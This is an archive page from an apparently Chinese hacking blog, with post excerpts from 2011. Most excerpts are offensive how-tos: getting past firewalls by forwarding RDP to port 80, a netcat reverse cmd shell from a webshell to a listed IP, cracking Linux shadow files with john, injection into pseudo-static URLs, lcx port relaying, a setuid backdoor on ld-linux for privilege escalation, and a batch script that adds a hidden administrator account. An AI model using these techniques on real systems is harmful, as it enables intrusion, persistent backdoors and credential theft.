上一页 1 ··· 13 14 15 16 17 18 19 20 21 ··· 30 下一页

2011年6月28日

转发3389到80突破防火墙

摘要: 干掉IPSEC后仍然无法连接3389,就可以用到此工具,自动停止IIS将3389转到80上工具的命令是在cmd下输入antifw -s 运行程序 停止iis将3389改为80antifw -l 关闭程序。恢复iisweb服务器肯定不限制80端口的连接,所以开了防火墙也不会限制80…所以用这个你再开防火墙也没有用。工具下载 阅读全文

posted @ 2011-06-28 13:59 =_=! 阅读(463) 评论(0) 推荐(0) 编辑

2011年6月24日

利用WebShell反弹低权限CmdShell

摘要: 虽然是低权限的,能做的事和WebShell上的差不多,不过使用起来还是要方便很多。前提:1.能用WebShell运行cmd命令。方法有很多,首先是WScript.Shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。2.上传nc。可以跟cmd.exe上传到同一目录。步骤:现在本地监听一个端口。nc -vv -l -p 8080最好是80或8080这样的端口,被防火墙拦截的几率小很多。我机器80被Apache占了,就用8080了。在WebShell运行下面命令连接我们监听的端口得到CmdShell:nc -vv 222.71.138.177 8080 -e C:\Documents 阅读全文

posted @ 2011-06-24 06:22 =_=! 阅读(780) 评论(0) 推荐(0) 编辑

PHP语法速查表

摘要: php 函式索引 967 个函式共有 967 个函式Abs: 取得绝对值。 Acos: 取得反余弦值。 ada_afetch: 取得资料库的传回列。 ada_autocommit: 开关自动更动功能。 ada_close: 关闭 Adabas D 连结。 ada_commit: 更动 Adabas D 资料库。 ada_connect: 连结至 Adabas D 资料库。 ada_exec: 执行 SQL 指令。 ada_fetchrow: 取得传回一列。 ada_fieldname: 取得栏位名称。 ada_fieldtype: 取得栏位资料形态。 ada_freeresult: 释出传回资 阅读全文

posted @ 2011-06-24 06:16 =_=! 阅读(236) 评论(0) 推荐(0) 编辑

2011年6月23日

另类找注入点技巧

摘要: 一般的注入点像我这种菜鸟都会用以下方式1:手工测试下2:用明小子或者阿D直接浏览页面找注入点3:通过搜索引擎site:xxx.com inurl:php or asp 之类的4:safe3 jsky之类的工具抓取连接后工具自动判断~~~方式1缺点:只能测试部分页面拉,有点看运气的感觉方式2缺点:基本和第一个的缺点差不多,不全面,只能浏览部分页面方式3缺点:搜索引擎收录有限哈,有些站甚至还没收录方式4缺点:所说是模拟抓取页面链接,在检测,可实际上每次都那么早结束了,爬不完全站,有些站点还限制了这类软件爬行今天给的思路是:方案1:1:自己本地架设个搜索引擎,蜘蛛的名字命名为“Baiduspider 阅读全文

posted @ 2011-06-23 00:08 =_=! 阅读(419) 评论(0) 推荐(0) 编辑

2011年6月16日

利用john破解Linux系统密码

摘要: 昨天利用任意下载漏洞得到了linux系统的passwd和shadow文件,如何破解系统密码呢?下面我就介绍利用john破解系统密码的方法一、下载john (官方网站http://www.openwall.com/john/)下载最新版 wget http://www.openwall.com/john/g/john-1.7.6.tar.gz二、安装并利用john破解密码[root@Centosliang run]# tar xzvf john-1.7.6.tar.gz[root@Centosliang run]# cd john-1.7.6[root@Centosliang run]# cd 阅读全文

posted @ 2011-06-16 18:44 =_=! 阅读(987) 评论(0) 推荐(0) 编辑

对伪静态网站实施注射

摘要: 伪静态网站注入方法,莱鸟扫盲来了哦,通常情况下,动态脚本的网站的url类似下面这样:http://www.91ri.org/news.php?id=111做了伪静态之后就成这样了http://www.91ri.org/news.php/id/111.html以斜杠“/”代替了“=”并在最后加上.html,这样一来,就无法直接用工具来注入了,现在我们就来讨论下如何用工具来注入,大家都知道cookies注入中转吧,其实原理都差不多,我们自己写一个动态网页脚本,构造自己的url规则,通过这个页面中转来访问目标页!即我们把伪静态url规则变回原来的?id=123这样的形式,形成一个普通的可方便注入的u 阅读全文

posted @ 2011-06-16 17:23 =_=! 阅读(197) 评论(0) 推荐(0) 编辑

2011年6月7日

lcx 用法

摘要: 本机:lcx.exe -listen 1314 2017 // 监听1314端口并转发到2017端口远程:lcx.exe -slave 你的ip 1314 服务器ip 3389 // 把远程端口3389转发到你的1314端口 然后在本机连接127.0.0.1:2017就是连接远程的3389端口 阅读全文

posted @ 2011-06-07 16:09 =_=! 阅读(541) 评论(0) 推荐(0) 编辑

2011年6月4日

webshell下linux提权+留后门

摘要: 方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2[root@localdomain lib]# chmod +s ld-linux.so.2[root@localdomain lib]# ls -l |grep ld 阅读全文

posted @ 2011-06-04 13:07 =_=! 阅读(510) 评论(0) 推荐(0) 编辑

2011年6月3日

bat全自动添加隐藏用户的脚本

摘要: net user admins$ 123456 /addnet localgroup administrators admins$ /addEcho HKEY_LOCAL_MACHINESAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINESAMSAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINESAMSAMDomains [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINESAMSAMDomainsAccount [1] >>c:/tem.iniEcho 阅读全文

posted @ 2011-06-03 02:36 =_=! 阅读(547) 评论(0) 推荐(0) 编辑

2011年5月29日

linux常用的命令

摘要: cat ./../mainfile.php -查看mainfile.php文件内容ls -la – 查看文件列表.ifconfig {eth0 etc} – 查看网卡信息.ps aux – 查看运行进程.gcc in_file -o out_file – 编译c文件.cat /etc/passwd – 查看系统账号.sudo – 普通用户运行root权限的命令,前提是 /etc/sudoers中有此账户的规则.id – 查看当前用户各种id.which wget curl w3m lynx – 查看当前可用的下载器uname -r -查看内核版本信息 (or) cat /etc/release 阅读全文

posted @ 2011-05-29 15:26 =_=! 阅读(159) 评论(0) 推荐(0) 编辑

上一页 1 ··· 13 14 15 16 17 18 19 20 21 ··· 30 下一页

导航